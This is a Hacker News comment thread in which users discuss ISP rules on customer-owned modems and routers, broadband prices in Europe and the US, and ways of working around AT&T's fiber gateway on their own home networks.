| education network. We are owned by our members.
| Heterogeneity is definitely par for the course, but that
| does not stop us from trying to roll out some ubiquity
| where we can. Many of our CPE routers are the same make and
| model, and that makes maintenance and analysis much less
| error prone. I.e. better service for our member
| institutions.
|
| If you want an ISP whose competitive advantage is dealing
| with whatever crazy shit the edge throws at it, then that
| is your prerogative. But having some ground rules and
| baseline behavior makes it so that the ISP can focus on
| more rewarding tasks, such as negotiating peerings,
| establishing direct tunnels, improving network
| observability, and predicting necessary backbone upgrades.
| pdonis wrote:
| _> having some ground rules and baseline behavior_
|
| Doesn't "if you choose to use your own cable
| modem/router, it must meet the DOCSIS 3 specification" do
| this? That's the rule Comcast made me follow.
| saber6 wrote:
| To bolster your point: Honestly they don't need to do much
| - the infrastructure is already there as a matter of being
| able to turn people's service up/down/on/off.
|
| There is always a provider-managed CPE device that
| functions as the service demarcation point. This is the
| point where your contracted service speed is enforced
| (shape + egress queue and ingress policing).
|
| You can have literally whatever router (dumb, smart, next-
| gen, whatever) spewing bits at X rate. The CPE will
| essentially normalize (police) that bit rate to your
| contracted speed (upstream scenario).
| pathseeker wrote:
| >The Internet itself is "a zoo of endpoints on a shared
| medium",
|
| No, the shared medium in this case is referring the last
| part of the cable network where everyone in a neighborhood
| is transmitting effectively onto the same cable.
|
| All it takes is a single device with a broken configuration
| to spew crap onto the wrong channels, taking down the whole
| neighborhood.
| https://en.wikipedia.org/wiki/DOCSIS#Physical_layer
|
| On the Internet it stops being a shared medium the minute
| it gets out of the cable network into fiber/ethernet
| switched+routed interconnections.
| hiram112 wrote:
| What's you cost and speed of the fiber?
|
| Also, if you didn't need so much bandwidth, is it possible to
| just order a basic 100Mb/10mb connection for a nominal fee of,
| say, 30Euro?
|
| The speeds in the US aren't actually that bad, but you're
| basically forced to pay for everything: paid cable TV,
| equipment rental fees, etc, and your $40 plan ends up creeping
| towards $100 / month after the fees and taxes, with increases
| every year.
| ProZsolt wrote:
| Don't know about NL, but in Hungary and a lot of other EU
| countries you can get 100Mb/10Mb for about 10 EUR, gigabit
| for 20-30.
| thedance wrote:
| This varies greatly by locale and is not uniform across the
| USA. In Berkeley, California I have fiber service that
| terminates in my own equipment, no rented equipment and no
| bundled services (TV, phone, etc). It's nominally symmetric
| gigabit service for $40/month.
| hugofloss wrote:
| For me, in NL, it's about 55 Euro per month for 200/200 fiber
| and TV (including fees and taxes). Unfortunately this
| increases every year in NL as well.
| msla wrote:
| I have Spectrum cable Internet. I use their modem, but I supply
| my own router, and they've never given me any trouble. In fact,
| they recently upgraded my modem (from a Scientific Atlanta
| 2203C to a Ubee E31U2V1) and they didn't send me a router. The
| Ubee E31U2V1, like the Scientific Atlanta 2203C before it, only
| has one Ethernet port, and their official guide to getting the
| new modem working involved rebooting an external router, so
| there's no possible way they have a problem with customer-owned
| routers.
|
| Which works out great for me. I can use OpenWRT with no hassle.
|
| More to the point, I see the cable stuff as "ISP land" in that
| it's directly interfacing with their internal hardware, and so
| has to dance to their tune very directly, whereas Ethernet and
| TCP/IP are common, and so will obey my rules in my home. I
| don't expect my modem to perform adblocking, which is why my
| router does it, and I'm not going to be stupid and try to
| "uncap" my modem to get more speed, so I don't see a point to
| being able to provide my own cable modem. As long as I can own
| the router which provides the only path in and out of my LAN, I
| can do everything I'm capable of doing anyway, as far as I can
| see.
| pmh wrote:
| > I don't see a point to being able to provide my own cable
| modem
|
| Other cable providers (e.g. Comcast) charge you a monthly fee
| (~$5-15) to rent their modem. Buying a modem gets cost
| effective pretty quickly.
| AmericanChopper wrote:
| I use my own one because the $2 Huawei ones perform really
| poorly, they're the source of a large portion of general
| internet performance issues for a lot of people.
| markus92 wrote:
| It's been more common for DSL too, but I haven't heard of
| anyone using their own DOCSIS modem for Ziggo though. Have you?
| r1ch wrote:
| Do you know if this applies to cable modems too? Are they
| required to allow a 3rd party modem that they normally wouldn't
| provide to customers?
| avip wrote:
| This law is a tech-support nightmare.
|
| You can call your ISP with _any_ arbitrary piece of non-branded
| random AliExpress $#@$ of a network eq. and they must walk you
| through configuring it? That does not make much sense to me.
| hedora wrote:
| The US has (had?) some network neutrality rules around
| discriminating against different types of hardware, but AT&T
| just does it anyway. (They require you to use their DSL modem +
| router + wifi and it has broken support for adding a second
| router behind it.)
| strbean wrote:
| Dealing with the same thing with AT&T fiber. There was word
| of a hack involving putting your router behind a switch with
| the AT&T router after cloning the MAC, then booting them both
| up and letting your router pick up the DHCP responses along
| with the AT&T router. Once the AT&T router had done its
| proprietary handshake, you could disconnect the AT&T router.
|
| Unfortunately I had no luck with that - my loose theory is
| that my EdgeRouter was doing a ping check to see if the IP
| was already taken before accepting the DHCP lease...
|
| I was able to get "IP passthrough" mode working with the AT&T
| router though. The key hiccup was that the AT&T router had to
| be on a different subnet than my router's LAN subnet.
| jonpurdy wrote:
| I just moved to SF and got AT&T gigabit fiber in mid-
| February. I followed this guide and got it working at
| gigabit speeds (eventually): https://www.reddit.com/r/Ubiqu
| iti/comments/cjw9jt/howto_bypa...
|
| It's been working great since I set it up; highly
| recommended!
|
| Hardware offloading needs to be enabled and QoS disabled
| for gigabit speeds (~900Mbps both ways, simultaneous
| ~500Mbps both ways).
|
| If you send me an email (hn-202003@jonpurdy.com), I can
| send you my exact configs.
| thinkloop wrote:
| How can you do without the modem? Which ubiquity product is
| that?
| hugofloss wrote:
| I used the Unifi Security Gateway to replace my ISP's modem.
| philg_jr wrote:
| Typically, FTTH doesn't require a "modem".
|
| In my case, I have VZ Fios in the northeast US. Their
| termination point at my house has an RJ45 Ethernet
| connection. It goes directly to my pfSense router.
| ksec wrote:
| So they actually have an ONT somewhere and provides you
| with a RJ45 Ethernet port only?
|
| This is brilliant! Why aren't more ISP doing it? I dont
| want another ONT / Modem / piece of equipment in my flat.
| cameronh90 wrote:
| As far as I'm aware, UK doesn't have a law like this, but I've
| never had a situation where an ISP cared, they just tell you
| that if you have problems they might not be able to help. I
| think you get interop issues with TV and landline with those
| ISPs where everything is bundled into one fibre, but the
| internet bit usually works fine.
| jedimastert wrote:
| I don't know if it's "law" in America but I've never seen a
| major ISP give any more guff than sometimes making a technician
| come out to read the modem's MAC address. I've never had a
| ISP's router or modem on my networks
| robotnikman wrote:
| Same. From my experience you can use a modem of your choice,
| you just need to provide your MAC address to your ISP and its
| good to go.
| PascLeRasc wrote:
| Slightly off-topic: I'd really like to run screenfetch on my
| router (Asus RT-N66U), but it doesn't have enough free space to
| sftp the script to it [1]. Piping the script just freezes up.
| Does anyone know a good workaround? Has anyone ever tried this?
|
| [1] https://unix.stackexchange.com/questions/510947/how-can-i-
| ru...
| Topgamer7 wrote:
| Check if your router has tmpfs mounted. Iirc thats ram, it
| should probably have enough space for you to upload it and run
| it from there.
| k__ wrote:
| The only router with good admin interface I ever had was one with
| open source software.
|
| Every other router, for 20 years now, had a slow and buggy web
| interface.
|
| Why is this?!
| skizm wrote:
| My ISP has a cloud access "feature". If I go to 192.168.1.1 it
| redirects me to their "router.MYISP.net" site. What's the best
| way to go about disabling this? Should I just dump the rented
| router for my own?
| simplyinfinity wrote:
| asus (and others) have the same feature. In my case it's a
| simple redirect from the ip of 192.168.1.1 to router.myasus.com
| which has a dns record of 192.168.1.1. so all it does is do a
| redirect to a domain.
___________________________________________________________________
(page generated 2020-03-26 23:00 UTC)